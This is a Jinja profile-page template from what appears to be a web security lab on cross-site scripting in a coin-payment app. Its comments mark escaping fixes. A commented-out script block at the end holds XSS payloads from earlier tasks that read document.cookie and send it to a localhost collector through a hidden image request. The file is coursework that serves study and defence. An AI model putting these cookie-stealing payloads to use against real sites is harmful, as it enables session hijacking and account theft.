{% extends "base.html" %}

{% block title %}Profile{% endblock %}

{% block content %}
<div class="profile-container">
  <h1 class="profile-header">{{ user.username|e }}</h1>
  <div>
    <strong>Coins:</strong> {{ user.coins|e }}
    <br>
    <!-- Task 2.7 sanitation check for stored XSS attack-->
    <strong>About Me:</strong><br>{{ user.aboutme|e }}
  </div>
</div>

<!-- Task 2.7 sanitaion check for reflected XSS attack-->
{% if user and user.username == session_user.username %}
<div class="payment-form">
  <h3 class="payment-header">Make payment?</h3>
  <form action="/pay" method="post">
    <div class="form-group">
      <div class="form-label">To:</div>
      <div class="form-input"><input name="recipient" type="text" /></div>
    </div>
    <div class="form-group">
      <div class="form-label">Amount:</div>
      <div class="form-input"><input name="amount" type="number" /></div>
    </div>
    <input class="form-button" type="submit" value="Pay"/>
  </form>

  {% if payment_error %}
  <div class="error"><p>{{ payment_error }}</p></div>
  {% endif %}
</div>

<div class="aboutme-form">
  <h3 class="aboutme-header">Update profile?</h3>
  <form action="/aboutme" method="post">
    <div class="form-group">
      <div class="form-input"><input name="aboutme" type="text" /></div>
    </div>
    <input class="form-button" type="submit" value="Update"/>
  </form>
</div>

<!-- <script>
  //Task 2.1
  // alert(document.cookie)
  // document.createElement("img").src = "http://localhost:8080/profile/my_attack_with_cookie=" + document.cookie;
  
  //Task 2.2
  attack = document.createElement("img");
  attack.setAttribute("src", "http://localhost:8081/xss_out?stolen_cookie="+ document.cookie);
  attack.setAttribute("hidden", true);

  //Task 2.3
  document.getElementsByClassName("error")[0].style.visibility = "hidden";

</script> -->

{% endif %}
{% endblock %}
